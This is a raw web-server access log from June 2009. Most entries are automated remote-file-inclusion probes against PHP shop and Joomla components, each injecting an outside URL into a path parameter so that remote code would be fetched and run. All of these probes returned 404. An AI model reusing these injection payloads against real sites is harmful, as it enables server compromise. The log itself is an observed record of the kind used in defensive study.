74.53.70.114 - - [24/Jun/2009:07:40:30 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.70.114 - - [24/Jun/2009:07:40:30 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:07:40:48 -0400] "GET /images/over-index7_david_sutures.jpg HTTP/1.1" 200 2567 "-" "Googlebot-Image/1.0"
74.53.70.114 - - [24/Jun/2009:07:41:08 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:41:14 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:41:22 -0400] "GET /logs/access_log.Q109051900%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:07:41:53 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:41:56 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
61.67.196.130 - - [24/Jun/2009:07:42:09 -0400] "GET //shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
61.67.196.130 - - [24/Jun/2009:07:42:09 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
61.67.196.130 - - [24/Jun/2009:07:42:10 -0400] "GET /logs//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
155.212.232.66 - - [24/Jun/2009:07:42:30 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:42:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:42:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:07:42:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
83.16.182.130 - - [24/Jun/2009:07:43:08 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.63.48.189 - - [24/Jun/2009:07:43:13 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://mmf.mb.ca/components/com_joomlaxplorer/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.817"
61.63.48.189 - - [24/Jun/2009:07:43:13 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://mmf.mb.ca/components/com_joomlaxplorer/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.817"
61.63.48.189 - - [24/Jun/2009:07:43:13 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://mmf.mb.ca/components/com_joomlaxplorer/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.817"
80.93.53.109 - - [24/Jun/2009:07:43:18 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:43:18 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:43:18 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [24/Jun/2009:07:43:19 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:43:19 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:43:19 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 240 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
80.93.53.109 - - [24/Jun/2009:07:43:19 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:43:19 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:43:19 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.98.209.71 - - [24/Jun/2009:07:43:21 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:43:21 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:43:21 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.63.48.189 - - [24/Jun/2009:07:43:24 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://mmf.mb.ca/components/com_joomlaxplorer/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.817"
80.93.53.109 - - [24/Jun/2009:07:43:30 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:43:30 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:43:30 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.67.196.130 - - [24/Jun/2009:07:43:30 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
209.59.12.99 - - [24/Jun/2009:07:43:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [24/Jun/2009:07:43:44 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:43:44 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:43:44 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:43:45 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:43:45 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:43:45 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:43:51 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:44:03 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:44:03 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:44:04 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:07:44:04 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:07:44:04 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
83.16.182.130 - - [24/Jun/2009:07:44:04 -0400] "GET /logs/access_log.Q109052500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:44:05 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:44:23 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:44:23 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:44:23 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:44:24 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:44:24 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:44:25 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:44:32 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:44:33 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
80.93.53.109 - - [24/Jun/2009:07:44:41 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:44:46 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:44:46 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:44:46 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:45:02 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
216.139.67.116 - - [24/Jun/2009:07:45:04 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:45:04 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:45:09 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:45:18 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:45:42 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.32.56.166 - - [24/Jun/2009:07:45:53 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.32.56.166 - - [24/Jun/2009:07:45:54 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.4.77.148 - - [24/Jun/2009:07:45:54 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.32.56.166 - - [24/Jun/2009:07:45:57 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.32.56.166 - - [24/Jun/2009:07:45:58 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.4.77.148 - - [24/Jun/2009:07:45:59 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.67.196.130 - - [24/Jun/2009:07:46:01 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
61.67.196.130 - - [24/Jun/2009:07:46:01 -0400] "GET //shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
61.67.196.130 - - [24/Jun/2009:07:46:01 -0400] "GET /logs//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
124.32.56.166 - - [24/Jun/2009:07:46:04 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:08 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
91.121.156.60 - - [24/Jun/2009:07:46:14 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:46:14 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:46:14 -0400] "GET /logs/access_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:46:16 -0400] "GET /logs/access_log.Q109050700//modules/My_eGallery/public/displayCategory.php?basepath=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.826"
80.93.53.109 - - [24/Jun/2009:07:46:16 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
172.16.1.180 - - [24/Jun/2009:07:46:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:46:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:46:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.98.209.71 - - [24/Jun/2009:07:46:33 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:46:33 -0400] "GET /logs/access_log.Q109052400%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:07:46:35 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
61.67.196.130 - - [24/Jun/2009:07:46:59 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
80.93.53.109 - - [24/Jun/2009:07:47:05 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:47:05 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:47:05 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:47:06 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:47:16 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:47:22 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 262 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:07:47:22 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:07:47:25 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 240 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
84.201.208.50 - - [24/Jun/2009:07:47:33 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:47:36 -0400] "GET /logs/access_log.Q109050900%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.168 - - [24/Jun/2009:07:47:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:07:47:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:07:47:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
80.93.53.109 - - [24/Jun/2009:07:47:50 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:48:09 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
